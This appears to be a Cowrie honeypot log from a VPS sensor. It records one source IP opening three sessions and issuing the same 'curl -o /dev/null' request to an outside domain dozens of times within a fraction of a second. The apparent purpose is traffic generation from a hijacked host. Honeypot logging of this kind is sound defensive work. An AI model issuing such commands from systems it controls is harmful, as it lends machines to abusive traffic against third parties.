{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.037951Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.038773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.041735Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.042509Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.045551Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.047983Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.048519Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.077634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.078820Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.079341Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.083465Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.085211Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.088279Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.088693Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.118138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.118881Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.121639Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.122276Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.128902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.132866Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.133699Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.166049Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.166785Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.170452Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.173379Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.175744Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.176584Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.180873Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.181832Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.185196Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.188960Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.216727Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.217462Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.221675Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.225883Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.226468Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.228080Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.228832Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.259372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.260922Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.262428Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.268116Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.269056Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.272825Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.275710Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.276627Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.305837Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.306551Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.311076Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.311692Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.314864Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.327447Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.328281Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.352399Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.355199Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.356476Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.356990Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.358600Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.359122Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.389150Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.389840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.395068Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.396544Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.397034Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.400001Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.402133Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.404470Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.422951Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.424601Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.425731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.426405Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.431809Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.432495Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.434164Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.434885Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.467357Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.469755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.471617Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.472336Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.474442Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.475059Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.476761Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.477364Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.512164Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.513580Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.514390Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.516703Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.517673Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.518933Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.519665Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
